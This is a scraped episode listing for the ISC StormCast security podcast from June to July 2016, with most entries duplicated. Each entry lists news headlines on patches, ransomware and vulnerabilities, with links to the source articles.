Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+July+2016/21249/ "Ranscam" Ransom Ware Deleted Data http://blog.talosintel.com/2016/07/ranscam.html
7/13/20167 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, July 13th 2016

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+July+2016/21249/ "Ranscam" Ransom Ware Deleted Data http://blog.talosintel.com/2016/07/ranscam.html
7/13/20167 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, July 12th 2016

Hiding in White Text: Word Documents with Embedded Payloads https://isc.sans.edu/forums/diary/Hiding+in+White+Text+Word+Documents+with+Embedded+Payloads/21227/ Pokemon Go Requests "Full Access" to iOS User's Google Account http://adamreeve.tumblr.com/post/147120922009/pokemon-go-is-a-huge-security-risk Hacking Siri With Barely Audible Voice Commands https://security.cs.georgetown.edu/~tavish/hvc_usenix.pdf iOS Users Locked Out of Devices by Ransom Attacks http://www.csoonline.com/article/3093016/security/apple-devices-held-for-ransom-rumors-claim-40m-icloud-accounts-hacked.html Contact Form For Feedback https://isc.sans.edu/contact.html
7/12/20166 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, July 12th 2016

Hiding in White Text: Word Documents with Embedded Payloads https://isc.sans.edu/forums/diary/Hiding+in+White+Text+Word+Documents+with+Embedded+Payloads/21227/ Pokemon Go Requests "Full Access" to iOS User's Google Account http://adamreeve.tumblr.com/post/147120922009/pokemon-go-is-a-huge-security-risk Hacking Siri With Barely Audible Voice Commands https://security.cs.georgetown.edu/~tavish/hvc_usenix.pdf iOS Users Locked Out of Devices by Ransom Attacks http://www.csoonline.com/article/3093016/security/apple-devices-held-for-ransom-rumors-claim-40m-icloud-accounts-hacked.html Contact Form For Feedback https://isc.sans.edu/contact.html
7/12/20166 minutes, 1 second
Episode Artwork

ISC StormCast for Monday, July 11th 2016

Pentesters (and Attackers) Love Internet Connected Security Cameras! https://isc.sans.edu/forums/diary/Pentesters+and+Attackers+Love+Internet+Connected+Security+Cameras/21231/ Lessons Learned From Industrial Control Systems https://isc.sans.edu/forums/diary/Lessons+Learned+from+Industrial+Control+Systems/21243/ BMW Portal Insecurity http://www.vulnerability-lab.com/get_content.php?id=1736 http://www.vulnerability-lab.com/get_content.php?id=1737 Pokemon Go App Used To Rob Users https://regmedia.co.uk/2016/07/10/34798567498753.pdf Facebook Messenger End-to-End Encryption http://newsroom.fb.com/news/2016/07/messenger-starts-testing-end-to-end-encryption-with-secret-conversations/
7/11/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, July 11th 2016

Pentesters (and Attackers) Love Internet Connected Security Cameras! https://isc.sans.edu/forums/diary/Pentesters+and+Attackers+Love+Internet+Connected+Security+Cameras/21231/ Lessons Learned From Industrial Control Systems https://isc.sans.edu/forums/diary/Lessons+Learned+from+Industrial+Control+Systems/21243/ BMW Portal Insecurity http://www.vulnerability-lab.com/get_content.php?id=1736 http://www.vulnerability-lab.com/get_content.php?id=1737 Pokemon Go App Used To Rob Users https://regmedia.co.uk/2016/07/10/34798567498753.pdf Facebook Messenger End-to-End Encryption http://newsroom.fb.com/news/2016/07/messenger-starts-testing-end-to-end-encryption-with-secret-conversations/
7/11/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, July 8th 2016

Patchwork: Is it still "Advanced" if all you have to do is Copy/Paste? https://isc.sans.edu/forums/diary/Patchwork+Is+it+still+Advanced+if+all+you+have+to+do+is+CopyPaste/21235/ OUCH Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016#july2016 Discovering Malware in TLS Traffic http://arxiv.org/abs/1607.01639 TP-Link Uses tplinklogin.net Domain http://thehackernews.com/2016/07/tp-link-router-setting.html
7/7/20165 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, July 8th 2016

Patchwork: Is it still "Advanced" if all you have to do is Copy/Paste? https://isc.sans.edu/forums/diary/Patchwork+Is+it+still+Advanced+if+all+you+have+to+do+is+CopyPaste/21235/ OUCH Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016#july2016 Discovering Malware in TLS Traffic http://arxiv.org/abs/1607.01639 TP-Link Uses tplinklogin.net Domain http://thehackernews.com/2016/07/tp-link-router-setting.html
7/7/20165 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, July 7th 2016

CryptXXX Update https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229/ Symantec Patches On the Way (but not fast) https://twitter.com/taviso?lang=en Android Adware/Malware https://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf HP Updates Comware and VCX Routers https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05184351 Tracking Devices With Randomized Wifi MAC Addresses http://papers.mathyvanhoef.com/asiaccs2016.pdf
7/7/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, July 7th 2016

CryptXXX Update https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229/ Symantec Patches On the Way (but not fast) https://twitter.com/taviso?lang=en Android Adware/Malware https://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf HP Updates Comware and VCX Routers https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05184351 Tracking Devices With Randomized Wifi MAC Addresses http://papers.mathyvanhoef.com/asiaccs2016.pdf
7/7/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, July 6th 2016

Apache Fixes Critical HTTP/2 TLS Authentication Flaw https://isc.sans.edu/forums/diary/Apache+Update+TLS+Certificate+Authentication+Bypass+with+HTTP2+CVE20164979/21223/ Gigabyte and HP Motherboards Affected by "ThinkPwn" UEFI Vulnerability https://twitter.com/al3xtjames UK Police Data Breaches https://www.bigbrotherwatch.org.uk/wp-content/uploads/2016/07/Safe-in-Police-Hands.pdf Mac Malware Uses Tor For C&C https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/ Front Door Intercom Backdoor http://www.synacktiv.ninja/ressources/NDH-Intercoms_presentation_Dudek.pdf wget arbitrary command line execution with redirects https://blogs.securiteam.com/index.php/archives/2701
7/6/20165 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, July 6th 2016

Apache Fixes Critical HTTP/2 TLS Authentication Flaw https://isc.sans.edu/forums/diary/Apache+Update+TLS+Certificate+Authentication+Bypass+with+HTTP2+CVE20164979/21223/ Gigabyte and HP Motherboards Affected by "ThinkPwn" UEFI Vulnerability https://twitter.com/al3xtjames UK Police Data Breaches https://www.bigbrotherwatch.org.uk/wp-content/uploads/2016/07/Safe-in-Police-Hands.pdf Mac Malware Uses Tor For C&C https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/ Front Door Intercom Backdoor http://www.synacktiv.ninja/ressources/NDH-Intercoms_presentation_Dudek.pdf wget arbitrary command line execution with redirects https://blogs.securiteam.com/index.php/archives/2701
7/6/20165 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, July 5th 2016

Change in patterns for the pseudoDarkleech Campaign https://isc.sans.edu/forums/diary/Change+in+patterns+for+the+pseudoDarkleech+campaign/21217/ Thinkpad SMS Arbitrary Code Execution Exploit https://github.com/Cr4sh/ThinkPwn SQLLite Temp File Vulnerability http://seclists.org/fulldisclosure/2016/Jul/0 AVG Publishes Mulit-Ransomware Decryption Tool http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/ Euro 2016 App Leaks User's Data http://wandera.com/downloads/Euro_Paper.pdf
7/5/20164 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, July 5th 2016

Change in patterns for the pseudoDarkleech Campaign https://isc.sans.edu/forums/diary/Change+in+patterns+for+the+pseudoDarkleech+campaign/21217/ Thinkpad SMS Arbitrary Code Execution Exploit https://github.com/Cr4sh/ThinkPwn SQLLite Temp File Vulnerability http://seclists.org/fulldisclosure/2016/Jul/0 AVG Publishes Mulit-Ransomware Decryption Tool http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/ Euro 2016 App Leaks User's Data http://wandera.com/downloads/Euro_Paper.pdf
7/5/20164 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, July 1st 2016

Phishing Campaign with Blurred Images https://isc.sans.edu/forums/diary/Phishing+Campaign+with+Blurred+Images/21207/ FoxIT Patches PDF Reader Security Flaws https://www.foxitsoftware.com/support/security-bulletins.php#content-2016 Vulnerabilities in StartCom's API https://www.computest.nl/blog/startencrypt-considered-harmful-today/ Hummer Trojan Leads Android Malware http://www.cmcm.com/blog/en/security/2016-06-29/995.html
7/1/20165 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, July 1st 2016

Phishing Campaign with Blurred Images https://isc.sans.edu/forums/diary/Phishing+Campaign+with+Blurred+Images/21207/ FoxIT Patches PDF Reader Security Flaws https://www.foxitsoftware.com/support/security-bulletins.php#content-2016 Vulnerabilities in StartCom's API https://www.computest.nl/blog/startencrypt-considered-harmful-today/ Hummer Trojan Leads Android Malware http://www.cmcm.com/blog/en/security/2016-06-29/995.html
7/1/20165 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, June 30th 2016

Critical Symantec AV Vulnerabilities http://googleprojectzero.blogspot.ca/2016/06/how-to-compromise-enterprise-endpoint.html Google "My Activity" https://myactivity.google.com/myactivity Hashcat/OCLHashcat 3.0 Released https://hashcat.net/forum/thread-5559.html Lenovo Thinkpad Firmware Reverse Analysis http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html Linux Privilege Escalation Vulnerabilities http://www.openwall.com/lists/oss-security/2016/06/24/5
6/30/20164 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, June 30th 2016

Critical Symantec AV Vulnerabilities http://googleprojectzero.blogspot.ca/2016/06/how-to-compromise-enterprise-endpoint.html Google "My Activity" https://myactivity.google.com/myactivity Hashcat/OCLHashcat 3.0 Released https://hashcat.net/forum/thread-5559.html Lenovo Thinkpad Firmware Reverse Analysis http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html Linux Privilege Escalation Vulnerabilities http://www.openwall.com/lists/oss-security/2016/06/24/5
6/30/20164 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, June 29th 2016

Odd User-Agents https://isc.sans.edu/forums/diary/What+is+your+most+unusual+UserAgent/21203/ ZimbraCrypt Ransomware http://www.bleepingcomputer.com/news/security/zimbra-ransomware-written-in-python-targets-zimbra-mail-store/ Hard Drives Still Not Wiped Before Selling Them on EBay http://www2.blancco.com/en-rs-leftovers-a-data-recovery-study PhotoLogin Option For LogmeOnce https://www.logmeonce.com/photologin/
6/29/20164 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, June 29th 2016

Odd User-Agents https://isc.sans.edu/forums/diary/What+is+your+most+unusual+UserAgent/21203/ ZimbraCrypt Ransomware http://www.bleepingcomputer.com/news/security/zimbra-ransomware-written-in-python-targets-zimbra-mail-store/ Hard Drives Still Not Wiped Before Selling Them on EBay http://www2.blancco.com/en-rs-leftovers-a-data-recovery-study PhotoLogin Option For LogmeOnce https://www.logmeonce.com/photologin/
6/29/20164 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, June 28th 2016

Recent Fake DDOS Threats by "Armada Collective" https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/ IRS Discontinues e-Filing Pins https://www.irs.gov/uac/irs-statement-on-the-electronic-filing-pin CCTV Cameras Still A Major Threat https://blog.sucuri.net/2016/06/large-cctv-botnet-leveraged-ddos-attacks.html
6/28/20166 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, June 28th 2016

Recent Fake DDOS Threats by "Armada Collective" https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/ IRS Discontinues e-Filing Pins https://www.irs.gov/uac/irs-statement-on-the-electronic-filing-pin CCTV Cameras Still A Major Threat https://blog.sucuri.net/2016/06/large-cctv-botnet-leveraged-ddos-attacks.html
6/28/20166 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, June 27th 2016

"Bart" Ransomware https://isc.sans.edu/forums/diary/Bart+a+new+Ransomware/21195/ Swagger Vulnerablity https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641 "Enriched" Voter Database Leak https://mackeeper.com/blog/post/239-another-us-voter-database-leak
6/27/20166 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, June 27th 2016

"Bart" Ransomware https://isc.sans.edu/forums/diary/Bart+a+new+Ransomware/21195/ Swagger Vulnerablity https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641 "Enriched" Voter Database Leak https://mackeeper.com/blog/post/239-another-us-voter-database-leak
6/27/20166 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, June 24th 2016

Uber Vulnerabliity Summary https://labs.integrity.pt/articles/uber-hacking-how-we-found-out-who-you-are-where-you-are-and-where-you-went/ Apple Intentially Left Kernel Decrypted https://techcrunch.com/2016/06/22/apple-unencrypted-kernel/ Wordpress Fixes Various Critical Vulnerabilities https://codex.wordpress.org/Version_4.5.3 Let's Encrypt Reaching 5 Million Issued Certificates https://letsencrypt.org/2016/06/22/https-progress-june-2016.html Necurs Botnet is Back https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-returns-with-updated-locky-ransomware-in-tow
6/24/20165 minutes
Episode Artwork

ISC StormCast for Friday, June 24th 2016

Uber Vulnerabliity Summary https://labs.integrity.pt/articles/uber-hacking-how-we-found-out-who-you-are-where-you-are-and-where-you-went/ Apple Intentially Left Kernel Decrypted https://techcrunch.com/2016/06/22/apple-unencrypted-kernel/ Wordpress Fixes Various Critical Vulnerabilities https://codex.wordpress.org/Version_4.5.3 Let's Encrypt Reaching 5 Million Issued Certificates https://letsencrypt.org/2016/06/22/https-progress-june-2016.html Necurs Botnet is Back https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-returns-with-updated-locky-ransomware-in-tow
6/24/20165 minutes
Episode Artwork

ISC StormCast for Thursday, June 23rd 2016

Deobfuscating Java Code https://isc.sans.edu/forums/diary/Security+through+obscurity+never+works/21187/ iOS 10 Beta Not Encrypted To Aid Bug Hunters https://www.technologyreview.com/s/601748/apple-opens-up-iphone-code-in-what-could-be-savvy-strategy-or-security-screwup/ Microsoft Updates SEAL http://research.microsoft.com/en-us/people/kilai/v2.0-beta.pdf Cisco Releases Pidgin Vulnerabilities http://blog.talosintel.com/2016/06/vulnerability-spotlight-pidgin.html Libarchive vulnerabilities http://blog.talosintel.com/2016/06/the-poisoned-archives.html
6/23/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, June 23rd 2016

Deobfuscating Java Code https://isc.sans.edu/forums/diary/Security+through+obscurity+never+works/21187/ iOS 10 Beta Not Encrypted To Aid Bug Hunters https://www.technologyreview.com/s/601748/apple-opens-up-iphone-code-in-what-could-be-savvy-strategy-or-security-screwup/ Microsoft Updates SEAL http://research.microsoft.com/en-us/people/kilai/v2.0-beta.pdf Cisco Releases Pidgin Vulnerabilities http://blog.talosintel.com/2016/06/vulnerability-spotlight-pidgin.html Libarchive vulnerabilities http://blog.talosintel.com/2016/06/the-poisoned-archives.html
6/23/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, June 22nd 2016

Apple Airport (and Time Capsule) Update https://support.apple.com/en-us/HT201222 StartCom Adding API For Free SSL Certificates https://support.apple.com/en-us/HT201222 BitCoin Phishing With Typo Squatting Domains http://blog.cyren.com/articles/2016-Q2_bitcoin-phishing-via-google-adwords.html Google Attempting to Simplify 2 Factor Authentication http://googleappsupdates.blogspot.co.uk/2016/06/new-settings-for-2-step-verification.html
6/22/20165 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, June 22nd 2016

Apple Airport (and Time Capsule) Update https://support.apple.com/en-us/HT201222 StartCom Adding API For Free SSL Certificates https://support.apple.com/en-us/HT201222 BitCoin Phishing With Typo Squatting Domains http://blog.cyren.com/articles/2016-Q2_bitcoin-phishing-via-google-adwords.html Google Attempting to Simplify 2 Factor Authentication http://googleappsupdates.blogspot.co.uk/2016/06/new-settings-for-2-step-verification.html
6/22/20165 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, June 21st 2016

Fake SWIFT Payment Notices Used in Malicious E-Mail Campaign https://isc.sans.edu/forums/diary/Ongoing+Spam+Campaign+Related+to+Swift/21177/ RedHat Fixes Various OpenSSL Integer Overflows https://github.com/openssl/openssl/commit/a004e72b95835136d3f1ea90517f706c24c03da7 JavaScript Ransom Ware http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/ Triada/Horde Mobile Malware Updates http://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/
6/21/20165 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, June 21st 2016

Fake SWIFT Payment Notices Used in Malicious E-Mail Campaign https://isc.sans.edu/forums/diary/Ongoing+Spam+Campaign+Related+to+Swift/21177/ RedHat Fixes Various OpenSSL Integer Overflows https://github.com/openssl/openssl/commit/a004e72b95835136d3f1ea90517f706c24c03da7 JavaScript Ransom Ware http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/ Triada/Horde Mobile Malware Updates http://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/
6/21/20165 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, June 20th 2016

Avoiding Javascript Malware https://isc.sans.edu/forums/diary/Controlling+JavaScript+Malware+Before+it+Runs/21171/ LogMeIn Joining Other Sites in Proactively Resetting Passwords https://blog.logmeininc.com/password-reuse-issue-affecting-logmein-users/ Kaspersky Publishes Details Around Recent Flash Vulnerability https://securelist.com/blog/research/75100/operation-daybreak/ CSRF Vulnerability in Democratic Party Donation Platform http://rajk.me/actblue/#intro
6/19/20165 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, June 20th 2016

Avoiding Javascript Malware https://isc.sans.edu/forums/diary/Controlling+JavaScript+Malware+Before+it+Runs/21171/ LogMeIn Joining Other Sites in Proactively Resetting Passwords https://blog.logmeininc.com/password-reuse-issue-affecting-logmein-users/ Kaspersky Publishes Details Around Recent Flash Vulnerability https://securelist.com/blog/research/75100/operation-daybreak/ CSRF Vulnerability in Democratic Party Donation Platform http://rajk.me/actblue/#intro
6/19/20165 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, June 17th 2016

Adobe Patches Critiical Flash Vulnerability https://helpx.adobe.com/security/products/flash-player/apsb16-18.html Teamviewer Users May be Compromised by Trojaned Client http://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging/ Siemens ICS Equipment Transmits Credentials Over the Network https://ics-cert.us-cert.gov/advisories/ICSA-16-161-02 GitHub Resets User Accounts Compromissed In 3rd Party Incident https://github.com/blog/2190-github-security-update-reused-password-attack HTTP Header Injection in Python urllib http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html
6/17/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, June 17th 2016

Adobe Patches Critiical Flash Vulnerability https://helpx.adobe.com/security/products/flash-player/apsb16-18.html Teamviewer Users May be Compromised by Trojaned Client http://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging/ Siemens ICS Equipment Transmits Credentials Over the Network https://ics-cert.us-cert.gov/advisories/ICSA-16-161-02 GitHub Resets User Accounts Compromissed In 3rd Party Incident https://github.com/blog/2190-github-security-update-reused-password-attack HTTP Header Injection in Python urllib http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html
6/17/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, June 16th 2016

Group Policy Issues After Applying MS16-072 (KB3159398) https://social.technet.microsoft.com/Forums/en-US/e2ebead9-b30d-4789-a151-5c7783dbbe34/patch-tuesday-kb3159398?forum=winserverGP Apple Will Reject Apps Using HTTP https://developer.apple.com/videos/play/wwdc2016/706/ Rising AntiVirus Includes Malware (article only in german) http://www.heise.de/security/meldung/Virenscanner-infiziert-Systeme-mit-Sality-Virus-3237654.html SAP Patch https://erpscan.com/press-center/blog/sap-security-notes-june-2016/ Breached RDP Servers For Rent https://www.wired.com/2016/06/xdedic-server-trading-forum-kaspersky/
6/16/20164 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, June 16th 2016

Group Policy Issues After Applying MS16-072 (KB3159398) https://social.technet.microsoft.com/Forums/en-US/e2ebead9-b30d-4789-a151-5c7783dbbe34/patch-tuesday-kb3159398?forum=winserverGP Apple Will Reject Apps Using HTTP https://developer.apple.com/videos/play/wwdc2016/706/ Rising AntiVirus Includes Malware (article only in german) http://www.heise.de/security/meldung/Virenscanner-infiziert-Systeme-mit-Sality-Virus-3237654.html SAP Patch https://erpscan.com/press-center/blog/sap-security-notes-june-2016/ Breached RDP Servers For Rent https://www.wired.com/2016/06/xdedic-server-trading-forum-kaspersky/
6/16/20164 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, June 15th 2016

Microsoft Updates https://isc.sans.edu/mspatchdays.html?viewday=2016-06-14 Adobe Updates (Incl. active exploitation of Flash Vuln.) https://helpx.adobe.com/security.html
6/15/20167 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, June 15th 2016

Microsoft Updates https://isc.sans.edu/mspatchdays.html?viewday=2016-06-14 Adobe Updates (Incl. active exploitation of Flash Vuln.) https://helpx.adobe.com/security.html
6/15/20167 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, June 14th 2016

Flocker Ransomware Locks TVs http://blog.trendmicro.com/trendlabs-security-intelligence/flocker-ransomware-crosses-smart-tv/ Samsung Updates Software Update Software http://seclists.org/fulldisclosure/2016/Jun/21 Lets Encrypt Messes Up Notification E-mail, Leaks Addresses https://community.letsencrypt.org/t/email-address-disclosures-preliminary-report-june-11-2016/16867 ClamAV Fuzzing Finds Bugs in 7z Unpacking Code https://foxglovesecurity.com/2016/06/13/finding-pearls-fuzzing-clamav/
6/14/20164 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, June 14th 2016

Flocker Ransomware Locks TVs http://blog.trendmicro.com/trendlabs-security-intelligence/flocker-ransomware-crosses-smart-tv/ Samsung Updates Software Update Software http://seclists.org/fulldisclosure/2016/Jun/21 Lets Encrypt Messes Up Notification E-mail, Leaks Addresses https://community.letsencrypt.org/t/email-address-disclosures-preliminary-report-june-11-2016/16867 ClamAV Fuzzing Finds Bugs in 7z Unpacking Code https://foxglovesecurity.com/2016/06/13/finding-pearls-fuzzing-clamav/
6/14/20164 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, June 13th 2016

DNS Sinkhole 2.0 Released https://isc.sans.edu/forums/diary/DNS+Sinkhole+ISO+Version+20/21153/ Visual C Telemetry Library https://www.reddit.com/r/cpp/comments/4ibauu/visual_studio_adding_telemetry_function_calls_to/ Crysis Ransomware http://www.eset.com/us/resources/detail/new-ransomware-threat-crysis-lays-claim-to-teslacrypt-s-former-turf/ Intel Releases ROP Attack Protection http://blogs.intel.com/evangelists/2016/06/09/intel-release-new-technology-specifications-protect-rop-attacks/ EMC Fixes Data Domain Session ID Disclosure Vulnerability https://auscert.org.au/render.html?it=35618
6/13/20165 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, June 13th 2016

DNS Sinkhole 2.0 Released https://isc.sans.edu/forums/diary/DNS+Sinkhole+ISO+Version+20/21153/ Visual C Telemetry Library https://www.reddit.com/r/cpp/comments/4ibauu/visual_studio_adding_telemetry_function_calls_to/ Crysis Ransomware http://www.eset.com/us/resources/detail/new-ransomware-threat-crysis-lays-claim-to-teslacrypt-s-former-turf/ Intel Releases ROP Attack Protection http://blogs.intel.com/evangelists/2016/06/09/intel-release-new-technology-specifications-protect-rop-attacks/ EMC Fixes Data Domain Session ID Disclosure Vulnerability https://auscert.org.au/render.html?it=35618
6/13/20165 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, June 10th 2016

Google Chrome PDF Viewer Remote Code Execution Vulnerability Patched http://blog.talosintel.com/2016/06/pdfium.html Google Continues to Remove SSLv3 Support http://googleappsupdates.blogspot.com.au/2016/06/gradually-disabling-support-for-sslv3.html Vibration Sensor Can Be Used As Microphone http://synrg.csl.illinois.edu/vibraphone/paperdocs/VibraPhone_nirupam.pdf Keypass Fixes Vulnerable Update Procedure http://keepass.info/help/kb/sec_issues.html#updsig
6/10/20165 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, June 10th 2016

Google Chrome PDF Viewer Remote Code Execution Vulnerability Patched http://blog.talosintel.com/2016/06/pdfium.html Google Continues to Remove SSLv3 Support http://googleappsupdates.blogspot.com.au/2016/06/gradually-disabling-support-for-sslv3.html Vibration Sensor Can Be Used As Microphone http://synrg.csl.illinois.edu/vibraphone/paperdocs/VibraPhone_nirupam.pdf Keypass Fixes Vulnerable Update Procedure http://keepass.info/help/kb/sec_issues.html#updsig
6/10/20165 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, June 9th 2016

CryptXXX Switches From Angler to Neutrino EK https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/ Android Flah Keyboard Uses Excessive Permissions https://regmedia.co.uk/2016/06/07/pentestflashkeybpardpaper.pdf Firefox 47 Released https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox/#firefox47 D-Link Camera Vulnerable To Remote Exploit http://blog.senr.io/blog/home-secure-home BITS used to make malware more persistent https://www.secureworks.com/blog/malware-lingers-with-bits
6/9/20165 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, June 9th 2016

CryptXXX Switches From Angler to Neutrino EK https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/ Android Flah Keyboard Uses Excessive Permissions https://regmedia.co.uk/2016/06/07/pentestflashkeybpardpaper.pdf Firefox 47 Released https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox/#firefox47 D-Link Camera Vulnerable To Remote Exploit http://blog.senr.io/blog/home-secure-home BITS used to make malware more persistent https://www.secureworks.com/blog/malware-lingers-with-bits
6/9/20165 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, June 8th 2016

Various Internet Sites Flag Password Reuse http://krebsonsecurity.com/2016/06/password-re-user-get-to-get-busy/ Facebook Chat Vulnerability Patched https://www.helpnetsecurity.com/2016/06/07/facebook-vulnerability-chat-messenger/ DNS Cookies: Making DNS More Security https://www.rfc-editor.org/rfc/rfc7873.txt
6/7/20165 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, June 8th 2016

Various Internet Sites Flag Password Reuse http://krebsonsecurity.com/2016/06/password-re-user-get-to-get-busy/ Facebook Chat Vulnerability Patched https://www.helpnetsecurity.com/2016/06/07/facebook-vulnerability-chat-messenger/ DNS Cookies: Making DNS More Security https://www.rfc-editor.org/rfc/rfc7873.txt
6/7/20165 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, June 7th 2016

LinkedIn Data Used to Personalize Malicious E-Mail https://twitter.com/certbund/status/739824856011804676?ref_src=twsrc%5Etfw Android Patches https://source.android.com/security/bulletin/2016-06-01.html Mitsubishi Outlander Wifi Hack https://www.pentestpartners.com/blog/hacking-the-mitsubishi-outlander-phev-hybrid-suv/ Using NTP to Calibrate Time Stamps in PCAP https://isc.sans.edu/forums/diary/What+Time+Is+It+Using+NTP+Traffic+to+Calibrate+PCAP+Timestamps/21135/ BING Adds Malware Warning https://blogs.bing.com/webmaster/June-2016/Warning!-Bing-now-offers-enhanced-malware-warnings
6/7/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, June 7th 2016

LinkedIn Data Used to Personalize Malicious E-Mail https://twitter.com/certbund/status/739824856011804676?ref_src=twsrc%5Etfw Android Patches https://source.android.com/security/bulletin/2016-06-01.html Mitsubishi Outlander Wifi Hack https://www.pentestpartners.com/blog/hacking-the-mitsubishi-outlander-phev-hybrid-suv/ Using NTP to Calibrate Time Stamps in PCAP https://isc.sans.edu/forums/diary/What+Time+Is+It+Using+NTP+Traffic+to+Calibrate+PCAP+Timestamps/21135/ BING Adds Malware Warning https://blogs.bing.com/webmaster/June-2016/Warning!-Bing-now-offers-enhanced-malware-warnings
6/7/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, June 6th 2016

A Recent MySQL Honeypot Compromise https://isc.sans.edu/forums/diary/MySQL+is+YourSQL/21117/ Team Viewer Improves Security http://www.teamviewer.com/en/company/press/teamviewer-launches-trusted-devices-and-data-integrity/ Black Shades Ransomware http://www.bleepingcomputer.com/news/security/black-shades-ransomware-encrypts-your-pc-and-taunts-security-researchers/ NTP Update http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities
6/5/20165 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, June 6th 2016

A Recent MySQL Honeypot Compromise https://isc.sans.edu/forums/diary/MySQL+is+YourSQL/21117/ Team Viewer Improves Security http://www.teamviewer.com/en/company/press/teamviewer-launches-trusted-devices-and-data-integrity/ Black Shades Ransomware http://www.bleepingcomputer.com/news/security/black-shades-ransomware-encrypts-your-pc-and-taunts-security-researchers/ NTP Update http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities
6/5/20165 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, June 3rd 2016

